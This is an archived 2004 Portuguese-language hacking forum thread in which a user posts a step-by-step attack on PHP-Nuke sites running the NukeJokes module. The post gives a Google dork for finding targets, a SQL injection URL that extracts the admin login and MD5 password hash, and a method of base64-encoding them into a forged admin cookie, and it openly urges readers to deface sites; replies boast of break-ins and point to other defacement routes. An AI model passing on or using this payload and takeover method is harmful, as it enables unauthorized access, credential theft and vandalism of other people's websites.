PDA

Ver Versão Completa : +uma vuln no php-nuke (NukeJokes) com ajuda do mIRC



RJB
27/05/2004, 05:25
primeiro va até o google e procure por...
allinurl: name=NukeJokes

em seguida acrescente no site...
modules.php?name=NukeJokes&ampfile=print&ampjokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

ficando assim:
[Only registered and activated users can see links]**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

ai se der certo vai aparecer o nome e a md5 tipo +ou- assim só que maior...
LOGIN_DO_ADMIN
31214572847167abc90d9fddc122713d

agora que entra i mIRC...abra o script que voce usa e digite...
//echo -a $encode(NomedoAdmin:MD5,m)

no exemplo que citei a cima vai ficar...
//echo -a $encode(LOGIN_DO_ADMIN:31214572847167abc90d9fddc12 2713d,m)

ai vai aparecer uma parada mais ou menos assim...
RGlhek5ldDozMTIxNDU3Mjg0NzE2N2FiYzkwZDlmZGRjMTIyNz EzZA==

depois vc acrescenta isso aqui...
[Only registered and activated users can see links]

ficando assim...
[Only registered and activated users can see links]

depois é so se logar..
onde que
defac3net = login
defacer = senha

ae se alguem conseguir fazer um deface nao esquece de mandar um salve para os caras do _Defac3net_

Net_Holer
31/05/2004, 07:24
Hmmm. Será que podes esplicar isso um bocado melhor?? Não a forma de fazer o deface mas o tipo de falha.

BLooDHounD
01/06/2004, 11:06
Esse cara ta viajando ele nao fala onde é para acrescentar nada em que site a gente vai... DEsculpe mais ta muito complicado mesmo esses textos eu duvido muito que qualquer uma das pesoas aqui que nao tenh aprofundo conhecimentos em php consiga fazer isso...

RJB
01/06/2004, 11:25
[quote:bc9ee5a4d3="chakal"]Esse cara ta viajando ele nao fala onde é para acrescentar nada em que site a gente vai...[/quote:bc9ee5a4d3]

Caro chakal... acho que quem esta viajando por aqui não sou...
primeiramente não é preciso saber de php para poder usar esta falha, eu não tenho conhecimentos em php mas consigo usa-la perfeitamente, se voce não entendeu este texto recomendo que leia um pouco mais e estude, este texto não esta tão complicado assim como voce diz, acontece que algumas pessoas estão muito mau acostumadas com textos escritos e explicados nos minimos detalhes e quando leem alguma coisa levemente menos detalhada ja ficam espantadas 8O ...

Leia novamente prestando muita atenção e veja os exemplos que coloquei quem sabe voce entenda o texto, mas se isso nao acontecer leia novamente e tente fazer isso tudo na pratica...

Agora Net_Holer desculpe-me não entendi oque você quis dizer com "tipo de falha"

Net_Holer
04/06/2004, 05:14
Esqueçe, agora nao consigo mesmo e fazer esse tipo de invasao. Tentei durante uma hora em varios sites mas nao resultou. Alguem me pode ajudar???
Obrigado

Dr Sinister
05/06/2004, 04:14
Eu acho que este método não funciona! Tem muita coisa incoerente neste texto.. o que a encriptação do mirc tem haver com o MD5 utilizado no pgp nuke??

qual a fonte deste texto??

rsla¥er
05/06/2004, 11:22
Esse método é complicado e trabalhoso, não tentei ele ainda por haver outros bem mais simples e funcional..
Tentem aprender sobres as vul de microsoft/IIS, adquirindo as ferramentas certas adeus Index.htm
:evil: rslayer :evil:

hydden
18/09/2004, 10:08
ja invadi muuuito com essa vul ae nen sei se funfa mais!!!!!!!!!

vida_loka
18/09/2004, 11:01
[quote:176be31f01="hydden"]ja invadi muuuito com essa vul ae nen sei se funfa mais!!!!!!!!![/quote:176be31f01]

ta ai demorou mas apareceu um cara que nao me deixa mentir... portanto metodo funcional sim :D :D :D

v355
19/09/2004, 06:30
[quote:8cf39f1142="Nilson"]Eu acho que este método não funciona! Tem muita coisa incoerente neste texto.. o que a encriptação do mirc tem haver com o MD5 utilizado no pgp nuke??

qual a fonte deste texto??[/quote:8cf39f1142]

A encriptação do mirc é na verdade a "Base-64" a mesma
usada no PHP-Nuke, curioso não? 8O

oke
20/09/2004, 07:28
como vou saber se o site esta vul... no google o end do site termina como?

hydden
25/09/2004, 01:42
essa vul é velha nen funfa mais nopzz.